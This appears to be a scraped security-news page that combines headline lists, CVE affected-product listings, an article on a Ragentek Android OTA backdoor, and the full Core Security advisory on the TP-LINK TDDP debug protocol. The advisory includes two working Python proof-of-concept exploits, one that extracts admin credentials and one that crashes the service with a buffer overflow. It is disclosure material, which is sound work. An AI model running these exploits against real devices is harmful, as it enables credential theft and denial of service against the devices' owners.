Harry Duran

Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

Backdoor Found in Firmware of Some Android Devices

November 21, 2016 , 3:20 pm

Threatpost News Wrap, November 18, 2016

November 18, 2016 , 9:15 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Credentials Accessible in Siemens-Branded CCTV Cameras

November 21, 2016 , 12:10 pm

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

1. Advisory Information

Title: TP-LINK TDDP Multiple Vulnerabilities
Advisory ID: CORE-2016-0007
Advisory URL: http://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities
Date published: 2016-11-21
Date of last update: 2016-11-18
Vendors contacted: TP-Link
Release mode: User release

2. Vulnerability Information

Class: Missing Authentication for Critical Function [CWE-306], Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [CWE-120]
Impact: Code execution, Information leak
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-pending-assignment-1, CVE-pending-assignment-2

3. Vulnerability Description

TP-LINK [1] ships some of their devices with a debugging protocol activated by default. This debugging protocol is listening on the 1040 UDP port on the LAN interface.

Vulnerabilities were found in the implementation of this protocol, that could lead to remote code execution and information leak (credentials acquisition).

4. Vulnerable Devices

TP-LINK WA5210g. (Firmware v1 and v2 are vulnerable)
Other devices might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

No workarounds are available for this device.

6. Credits

This vulnerability was discovered and researched by Andres Lopez Luksenberg from Core Security Exploit Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.

7. Technical Description / Proof of Concept Code

TP-LINK distributes some of their hardware with a debugging service activate by default. This program uses a custom protocol. Vulnerabilities were found using this protocol, that could lead to remote code execution or information leak.

7.1. Missing Authentication for TDDP v1

[CVE-pending-assignment-1] If version 1 is selected when communicating with the TDDP service, there is a lack of authentication in place. Additionally if the message handler accepts the "Get configuration" message type, this will result in the program leaking the web interface configuration file, which includes the web login credentials.

The following is a proof of concept to demonstrate the vulnerability (Impacket [2] is required for the PoC to work):

import socket
import re
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
structure = (
('version','B=0x1'),
('type','B=0'),
('code','B=0'),
('replyInfo','B=0'),
('packetLength','>L=0'),
('pktID','<H=1'),
('subType','B=0'),
('reserved','B=0'),
('payload',':=""'),
)
def printPayload(self):
print self.getPayloadAsString()

def getPayloadAsString(self):
s=''
for i in range(len(self['payload'])):
s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
return s

class TDDPRequestsPacketBuilder(object):
SET_CONFIG = 1
GET_CONFIG = 2
CMD_SYS0_PR = 3
GET_SERIAL_NUMBER = 5

GET_PRODUCT_ID = 10

def getRequestPacket(self):
tddp = TDDP()
tddp['version'] = 1
tddp['replyInfo'] = 1
return tddp

def getConfigPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_CONFIG
tddp['payload'] = ('\x00'*0x10) + 'all'
tddp['packetLength'] = len(tddp['payload'])
return tddp

def setConfigPacket(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.SET_CONFIG
tddp['payload'] = ('\x00'*0x10) + trail
tddp['packetLength'] = len(tddp['payload'])
return tddp

def getSerialNumberPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_SERIAL_NUMBER
return tddp

def getProductIDPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_PRODUCT_ID
return tddp

def CMD_SYS0_PR_Packet(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.CMD_SYS0_PR
tddp['replyInfo'] = 2
tddp['payload'] = ('\x00'*0x10)
tddp['packetLength'] = len(tddp['payload'])
tddp['payload'] += trail
return tddp

class TPLINKConfig(object):
def __init__(self, aConfig):
self.__parseConfig(aConfig)

def __sanitizeKeyValue(self, k, v):
k = k.replace("\r", "")
k = k.replace("\n", "")

v = v.replace("\r", "")
v = v.replace("\n", "")

return k,v

def __parseConfig(self, aConfig):
self.__key_order = []
self.Header = aConfig[:0x10]
pending = aConfig[0x10:]
k_v = re.findall("(.*?) (.*)", pending)

for k, v in k_v:
k,v = self.__sanitizeKeyValue(k,v)
real_value = v.split(" ")
if len(real_value) == 1:
real_value = real_value[0]

self.__dict__[k] = real_value
self.__key_order.append(k)

def __str__(self):
cfg = []
cfg.append(self.Header)

for k in self.__key_order:
value = self.__dict__[k]

if not isinstance(value, basestring):
str_value = " ".join(value)
else:
str_value = value

line = "%s %s" % (k, str_value)

cfg.append(line)

str_cfg = "\r\n".join(cfg)

return str_cfg

class TDDPSessionV1(object):
def __init__(self, ip, port=1040):
self.ip = ip
self.port = port
self.req_buidler = TDDPRequestsPacketBuilder()

def send(self, aPacket):
self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.conn.sendto(str(aPacket), (self.ip, self.port))
self.conn.close()

def recv(self, n):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(('', 61000))
data, addr = udp.recvfrom(n)
return TDDP(data)

def _send_and_recv(self, packet, n):
self.send(packet)
return self.recv(n)

#####################################
def getConfig(self):
c_packet = self.req_buidler.getConfigPacket()
return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])

def getSerialNumber(self):
c_packet = self.req_buidler.getSerialNumberPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()

def getProductID(self):
c_packet = self.req_buidler.getProductIDPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()

def setInitState(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
return self._send_and_recv(c_packet, 50000)

def save(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
self._send_and_recv(c_packet, 50000)

def reboot(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
self._send_and_recv(c_packet, 50000)

def clr_dos(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
self._send_and_recv(c_packet, 50000)

def setConfig(self, aConfig):
c_packet = self.req_buidler.setConfigPacket(str(aConfig))
self._send_and_recv(c_packet, 50000)

HOST = "192.168.1.254"

s = TDDPSessionV1(HOST)
config = s.getConfig()
print "user: ", config.lgn_usr
print "pass: ", config.lgn_pwd

7.2. Buffer Overflow in TDDP v1 protocol

[CVE-pending-assignment-2] A buffer overflow vulnerability was found when sending a handcrafted "set configuration" message to the TDDP service with an extensive configuration file and forcing version 1 in the packet.

The following is a proof of concept to demonstrate the vulnerability by crashing the TDDP service (Impacket [2] is required for the PoC to work). To reestablish the TDDP service the device must be restarted:

import socket
import re
import string
from impacket.winregistry import hexdump
from impacket.structure import Structure
import struct

class TDDP(Structure):
structure = (
('version','B=0x1'),
('type','B=0'),
('code','B=0'),
('replyInfo','B=0'),
('packetLength','>L=0'),
('pktID','<H=1'),
('subType','B=0'),
('reserved','B=0'),
('payload',':=""'),
)
def printPayload(self):
print self.getPayloadAsString()

def getPayloadAsString(self):
s=''
for i in range(len(self['payload'])):
s += "%.2X" % struct.unpack("B", self['payload'][i])[0]
return s

class TDDPRequestsPacketBuilder(object):
SET_CONFIG = 1
GET_CONFIG = 2
CMD_SYS0_PR = 3
GET_SERIAL_NUMBER = 5

GET_PRODUCT_ID = 10

def getRequestPacket(self):
tddp = TDDP()
tddp['version'] = 1
tddp['replyInfo'] = 1
return tddp

def getConfigPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_CONFIG
tddp['payload'] = ('\x00'*0x10) + 'all'
tddp['packetLength'] = len(tddp['payload'])
return tddp

def setConfigPacket(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.SET_CONFIG
tddp['payload'] = ('\x00'*0x10) + trail
tddp['packetLength'] = len(tddp['payload'])
return tddp

def getSerialNumberPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_SERIAL_NUMBER
return tddp

def getProductIDPacket(self):
tddp = self.getRequestPacket()
tddp['type'] = self.GET_PRODUCT_ID
return tddp

def CMD_SYS0_PR_Packet(self, trail):
tddp = self.getRequestPacket()
tddp['type'] = self.CMD_SYS0_PR
tddp['replyInfo'] = 2
tddp['payload'] = ('\x00'*0x10)
tddp['packetLength'] = len(tddp['payload'])
tddp['payload'] += trail
return tddp

class TPLINKConfig(object):
def __init__(self, aConfig):
self.__parseConfig(aConfig)

def __sanitizeKeyValue(self, k, v):
k = k.replace("\r", "")
k = k.replace("\n", "")

v = v.replace("\r", "")
v = v.replace("\n", "")

return k,v

def __parseConfig(self, aConfig):
self.__key_order = []
self.Header = aConfig[:0x10]
pending = aConfig[0x10:]
k_v = re.findall("(.*?) (.*)", pending)

for k, v in k_v:
k,v = self.__sanitizeKeyValue(k,v)
real_value = v.split(" ")
if len(real_value) == 1:
real_value = real_value[0]

self.__dict__[k] = real_value
self.__key_order.append(k)

def __str__(self):
cfg = []
cfg.append(self.Header)

for k in self.__key_order:
value = self.__dict__[k]

if not isinstance(value, basestring):
str_value = " ".join(value)
else:
str_value = value

line = "%s %s" % (k, str_value)

cfg.append(line)

str_cfg = "\r\n".join(cfg)

return str_cfg

class TDDPSessionV1(object):
def __init__(self, ip, port=1040):
self.ip = ip
self.port = port
self.req_buidler = TDDPRequestsPacketBuilder()

def send(self, aPacket):
self.conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.conn.sendto(str(aPacket), (self.ip, self.port))
self.conn.close()

def recv(self, n):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.bind(('', 61000))
data, addr = udp.recvfrom(n)
return TDDP(data)

def _send_and_recv(self, packet, n):
self.send(packet)
return self.recv(n)

#####################################
def getConfig(self):
c_packet = self.req_buidler.getConfigPacket()
return TPLINKConfig(self._send_and_recv(c_packet, 50000)['payload'])

def getSerialNumber(self):
c_packet = self.req_buidler.getSerialNumberPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()

def getProductID(self):
c_packet = self.req_buidler.getProductIDPacket()
return self._send_and_recv(c_packet, 50000).getPayloadAsString()

def setInitState(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("init")
return self._send_and_recv(c_packet, 50000)

def save(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("save")
self._send_and_recv(c_packet, 50000)

def reboot(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("reboot")
self._send_and_recv(c_packet, 50000)

def clr_dos(self):
c_packet = self.req_buidler.CMD_SYS0_PR_Packet("clr_dos")
self._send_and_recv(c_packet, 50000)

def setConfig(self, aConfig):
c_packet = self.req_buidler.setConfigPacket(str(aConfig))
self._send_and_recv(c_packet, 50000)

class Exploit(TDDPSessionV1):
def run(self):
c_packet = self.req_buidler.getRequestPacket()
c_packet['type'] = self.req_buidler.SET_CONFIG
c_packet['payload'] = "A"*325
c_packet['packetLength'] = 0x0264
return self.send(c_packet)

HOST = "192.168.1.254"
PORT = 1040
s = Exploit(HOST)
s.run()

8. Report Timeline

2016-10-04: Core Security sent an initial notification to TP-Link.
2016-10-07: Core Security sent a second notification to TP-Link.
2016-10-31: Core Security sent a third notification to TP-Link through Twitter.
2016-11-09: Core Security sent a fourth notification to TP-Link through email and Twitter without receiving any response whatsoever.
2016-11-10: Core Security sent a request to Mitre for two CVE ID's for this advisory.
2016-11-12: Mitre replied that the vulnerabilities didn't affected products that were in the scope for CVE.
2016-11-21: Advisory CORE-2016-0007 published.
9. References

[1] http://www.tplink.com/.
[2] https://www.coresecurity.com/corelabs-research/open-source-tools/impacket.

10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Courion and Core Security have rebranded the combined company, changing its name to Core Security, to reflect the company's strong commitment to providing enterprises with market-leading, threat-aware, identity, access and vulnerability management solutions that enable actionable intelligence and context needed to manage security risks across the enterprise. Core Security's analytics-driven approach to security enables customers to manage access and identify vulnerabilities, in order to minimize risks and maintain continuous compliance. Solutions include Multi-Factor Authentication, Provisioning, Identity Governance and Administration (IGA), Identity and Access Intelligence (IAI), and Vulnerability Management (VM). The combination of these solutions provides context and shared intelligence through analytics, giving customers a more comprehensive view of their security posture so they can make more informed, prioritized, and better security remediation decisions.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected]

12. Disclaimer

The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


Exploit Files ≈ Packet Storm

Bugtraq ID: 93191 Class: Design Error CVE: CVE-2016-7099 Remote: Yes Local: No Published: Sep 28 2016 12:00AM Updated: Nov 19 2016 01:03AM Credit: Alexander Minozhenko and James Bunton (Atlassian). Vulnerable: Nodejs Node.Js 6.0
Nodejs Node.Js 4.0
Nodejs Node.Js 0.12
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1 Not Vulnerable: Nodejs Node.Js 6.7
Nodejs Node.Js 4.6
Nodejs Node.Js 0.12.16
IBM SDK for Node.js 6.7.0.0
IBM SDK for Node.js 4.6.0.0
IBM SDK for Node.js 1.2.0.15
IBM SDK for Node.js 1.1.1.4


SecurityFocus Vulnerabilities

If you’re using a cheap Android smartphone manufactured or sold by BLU, Infinix, Doogee, Leagoo, IKU, Beeline or Xolo, you are likely wide open to Man-in-the-Middle attacks that can result in your device being thoroughly compromised.

Android smartphones backdoor

A more detailed (but not complete) list of vulnerable devices can be found in an advisory by CERT/CC.

This discovery comes less than a week after researchers from Kryptowire identified several models of Android mobile devices that contain firmware that collects sensitive data about their owners and secretly transmits it to servers owned by a company named Shanghai Adups Technology Co. Ltd.

Among these mobile devices are also some BLU smartphones.

The origin of the vulnerability (CVE-2016-6564)

Those and other devices (roughly 55 device models) are open to attack because they sport the same firmware by Chinese software company Ragentek Group.

This firmware contains a binary that is responsible for enabling over-the-air (OTA) software updating, but unfortunately the mechanism is flawed.

For one, the update requests and supplied updates are sent over an unencrypted channel. Secondly, until a few days ago, two Internet domains that the firmware is instructed to contact for updates (the addresses are hardwired into it) were unregistered – meaning anybody could have registered them and delivered malicious updates and commands to compromise the devices.

Luckily, it was researchers from Anubis Networks that did it, and the move allowed them clock over 2.8 million devices that contacted the domains in search for updates. Many of these devices are located in the US, as most of the models are sold by Best Buy and Amazon.

But even though the domains are now owned by these security companies, the fact that updates are delivered over an unencrypted channel allows attackers with a MitM position to intercept legitimate updates and exchange them for malicious ones (the firmware does not check for any signatures to assure the updates’ legitimacy).

MitM attackers could also send responses that would make the devices execute arbitrary commands as root, install applications, or update configurations.

Is this a deliberate backdoor/rootkit?

It does seem so. According to the researchers, the binary that performs OTA update checks – debugs, in the /system/bin/ folder – runs with root privileges, but its presence and the process it starts are being actively hidden by the firmware.

“It’s unclear why the author of this process wanted to purposely hide the presence of the process and local database on the device, although it’s worth noting that it did not attempt to do this comprehensively,” they researchers noted.

But they told Ars Technica that believe the backdoor capabilities were unintentional, and Ragentek is yet to comment on the discovery.

How to protect yourself?

If you’re using one of the affected devices, the right solution is to implement an update with the fix – when it becomes available. But make sure to download the update only over trusted networks and/or use a VPN to encrypt and protect the traffic from tampering.

So far, only BLU has released such an update, but the fix has not yet been checked.

A workaround that should keep you safe until a security update includes using your device only on trusted networks (eg. your home network, as opposed to open or public Wi-Fi).


Help Net Security

Bugtraq ID: 92630 Class: Design Error CVE: CVE-2016-2183 Remote: Yes Local: No Published: Aug 24 2016 12:00AM Updated: Nov 19 2016 12:10AM Credit: Karthik Bhargavan and Gaetan Leurent from Inria. Vulnerable: Redhat Enterprise Linux 7
Redhat Enterprise Linux 6
Redhat Enterprise Linux 5
Pexip Pexip Infinity 9.1
Pexip Pexip Infinity 9
Pexip Pexip Infinity 8.1
Pexip Pexip Infinity 8
Pexip Pexip Infinity 7
Pexip Pexip Infinity 6
Pexip Pexip Infinity 5
Pexip Pexip Infinity 4
Pexip Pexip Infinity 12.2
Pexip Pexip Infinity 12.1
Pexip Pexip Infinity 12
Pexip Pexip Infinity 11.1
Pexip Pexip Infinity 11
Pexip Pexip Infinity 10.2
Pexip Pexip Infinity 10.1
Pexip Pexip Infinity 10
Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
Oracle VM VirtualBox 5.0.8
Oracle VM VirtualBox 5.0.18
Oracle VM VirtualBox 5.0
Oracle Mysql 5.7.15
Oracle Mysql 5.7.14
Oracle Mysql 5.7.13
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.6.33
Oracle Mysql 5.6.32
Oracle Mysql 5.6.31
Oracle Mysql 5.6.30
Oracle Mysql 5.6.28
Oracle Mysql 5.6.27
Oracle Mysql 5.6.26
Oracle Mysql 5.6.25
Oracle Mysql 5.6.24
Oracle Mysql 5.6.23
Oracle Mysql 5.6.22
Oracle Mysql 5.6.21
Oracle Mysql 5.6.17
Oracle Mysql 5.6.12
Oracle Mysql 5.6.11
Oracle Mysql 5.6.10
Oracle Mysql 5.6.9
Oracle Mysql 5.6.6
Oracle Mysql 5.6
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.6.8
Oracle Mysql 5.6.7
Oracle Mysql 5.6.5
Oracle Mysql 5.6.4
Oracle Mysql 5.6.29
Oracle Mysql 5.6.20
Oracle Mysql 5.6.2
Oracle Mysql 5.6.19
Oracle Mysql 5.6.18
Oracle Mysql 5.6.16
Oracle Mysql 5.6.15
Oracle Mysql 5.6.14
Oracle Mysql 5.6.13
Oracle Enterprise Linux 5
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.1t
NetApp Virtual Storage Console for VMware vSphere 0
NetApp System Setup 0
NetApp Snap Creator Framework 0
NetApp ONTAP Select Deploy administration tool 0
NetApp OnCommand Insight 0
NetApp OnCommand API Services 0
NetApp Manageability SDK 0
NetApp EF-Series SANtricity Storage Manager 0
NetApp E-Series SANtricity Storage Manager 0
NetApp Data ONTAP PowerShell Toolkit 0
NetApp Data ONTAP 7-Mode 0
NetApp Clustered Data ONTAP 0
IBM Vios 2.2
IBM Sterling Connect:Express for UNIX 1.5.0.9
IBM Sterling Connect:Express for UNIX 1.5.0.13
IBM Sterling Connect:Express for UNIX 1.5.0.12
IBM Sterling Connect:Express for UNIX 1.5.0.11
IBM Sterling Connect:Express for UNIX 1.5.0
IBM Sterling Connect:Express for UNIX 1.4.6
IBM Sterling Connect:Express for UNIX 1.4
IBM SDK for Node.js 6.6.0.0
IBM SDK for Node.js 6.2.0.0
IBM SDK for Node.js 6.1.0.0
IBM SDK for Node.js 6.0.0.0
IBM SDK for Node.js 4.5.0.0
IBM SDK for Node.js 4.4.6.0
IBM SDK for Node.js 4.4.5.0
IBM SDK for Node.js 4.4.4.0
IBM SDK for Node.js 4.4.3.0
IBM SDK for Node.js 4.4.2.0
IBM SDK for Node.js 4.4.1.0
IBM SDK for Node.js 4.4.0.0
IBM SDK for Node.js 4.3.2.0
IBM SDK for Node.js 4.3.1.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.2.0.14
IBM SDK for Node.js 1.2.0.13
IBM SDK for Node.js 1.2.0.12
IBM SDK for Node.js 1.2.0.11
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.2.0.1
IBM SDK for Node.js 1.1.1.3
IBM SDK for Node.js 1.1.1.2
IBM SDK for Node.js 1.1.1.1
IBM SDK for Node.js 1.1.1.0
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.21
IBM SDK for Node.js 1.1.0.20
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM SDK for Node.js 1.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
IBM i 7.3
IBM i 7.2
IBM i 7.1
IBM BigFix Remote Control 9.1.2
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3
HP Integrated Lights-Out 4 firmware 2.50
HP Integrated Lights-Out 4 firmware 2.44
HP Integrated Lights-Out 4 firmware 2.22
HP Integrated Lights-Out 4 firmware 2.20
HP Integrated Lights-Out 4 firmware 2.03
HP Integrated Lights-Out 4 firmware 1.32
HP Integrated Lights-Out 4 firmware 1.30
HP Integrated Lights-Out 4 firmware 1.22
HP Integrated Lights-Out 4 firmware 1.13
HP Integrated Lights-Out 4 firmware 1.11
HP Integrated Lights-Out 4 firmware 2.10
Cisco Wide Area Application Services (WAAS) 0
Cisco WebEx Node for MCS 0
Cisco WebEx Meetings Server - Multimedia Platform (MMP) 0
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.0
Cisco WebEx Meetings for Windows Phone 8 0
Cisco WebEx Meetings for BlackBerry 0
Cisco WebEx Meetings for Android 0
Cisco WebEx Meetings Client - On-Premises 0
Cisco WebEx Meetings Client - Hosted 0
Cisco WebEx Meeting Center 0
Cisco WebEx Business Suite 0
Cisco Web Security Appliance (WSA) 0
Cisco Visual Quality Experience Tools Server 0
Cisco Visual Quality Experience Server 0
Cisco Virtualization Experience Media Edition 0
Cisco Virtual Security Gateway 0
Cisco Videoscape Control Suite 0
Cisco Videoscape AnyRes Live 0
Cisco Video Surveillance PTZ IP Cameras 0
Cisco Video Surveillance Media Server 0
Cisco Video Surveillance 7000 Series IP Cameras 0
Cisco Video Surveillance 6000 Series IP Cameras 0
Cisco Video Surveillance 4300E and 4500E High-Definition IP Cameras 0
Cisco Video Surveillance 4000 Series High-Definition IP Cameras 0
Cisco Video Surveillance 3000 Series IP Cameras 0
Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS) 0
Cisco Universal Small Cell Iuh 0
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 2.99.4
Cisco Universal Small Cell CloudBase Factory Recovery Root Filesystem 0
Cisco Universal Small Cell 7000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 3.4.2.0
Cisco Universal Small Cell 5000 Series 0
Cisco Unity Express 0
Cisco Unity Connection 0
Cisco Unified Workforce Optimization - Quality Management Solution 0
Cisco Unified Workforce Optimization 0
Cisco Unified SIP Proxy Software 0
Cisco Unified MeetingPlace 0
Cisco Unified IP 9971 Phone 0
Cisco Unified IP 9951 Phone 0
Cisco Unified IP 8961 Phone 0
Cisco Unified IP 8945 Phone 0
Cisco Unified IP 8831 Conference Phone for Third-Party Call Control 0
Cisco Unified IP 8831 Conference Phone 0
Cisco Unified IP 7900 Series Phones 0
Cisco Unified IP 6945 Phone 0
Cisco Unified IP 6901 Phone 0
